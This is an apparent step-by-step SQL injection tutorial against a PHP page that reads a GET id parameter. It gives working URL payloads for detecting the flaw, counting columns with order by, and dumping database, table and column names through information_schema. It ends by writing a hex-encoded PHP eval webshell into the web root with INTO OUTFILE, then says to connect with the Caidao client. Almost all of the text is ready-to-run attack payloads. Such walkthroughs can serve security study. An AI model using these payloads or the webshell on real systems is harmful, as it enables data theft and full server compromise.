A site that takes a GET parameter and returns data from the database based on it:
http://127.0.0.1/index.php?id=1
Try the following to check whether an injection point exists (the first pair tests a numeric context; from the order by probes onward the payloads assume the id is wrapped in single quotes, and %23 is the URL-encoded # that comments out the rest of the original query, including its closing quote):
http://127.0.0.1/index.php?id=1 and 1=1
http://127.0.0.1/index.php?id=1 and 1=2
http://127.0.0.1/index.php?id=1'order by 1%23
http://127.0.0.1/index.php?id=1'order by 2%23
...and so on until the query errors; the last value that still works is the number of columns in the original SELECT (three in this example).
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 %23
Column 2 is the one echoed on the page, so that is the position to put the expression in.
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,user(),3 %23
Shows which MySQL account the application connects as (user() returns the account name, not its privileges; whether it holds FILE, needed for the INTO OUTFILE step below, can be checked in information_schema.user_privileges).
Dump database names:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct schema_name),3 from information_schema.schemata %23
Dump table names:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct table_name),3 from information_schema.tables where table_schema=database()%23
Dump column names:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct column_name),3 from information_schema.columns where table_schema=database() and table_name=0x6269616f6d696e67%23
Note:
0x6269616f6d696e67 is the table name as a hexadecimal literal; MySQL treats 0x... as a string here, so the payload carries no quote characters that a filter might strip or escape.
The HackBar add-on for Firefox can do the conversion directly.
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct ziduan_name),3 from table_name%23
Note:
ziduan_name is the column to read;
table_name is the table it lives in (both are placeholders for the values found in the previous two steps).
Writing a one-line webshell through the GET injection:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,0x3c3f70687020406576616c28245f504f53545b3132335d293b3f3e,3 into outfile 'C:\\WWW\\shell.php'%23
Note:
0x3c3f70687020406576616c28245f504f53545b3132335d293b3f3e is the hex of <?php @eval($_POST[123]);?>; C:\WWW\shell.php is the absolute path of the web root on the server (the doubled backslashes are MySQL string escapes).
接着使用菜刀連接即可。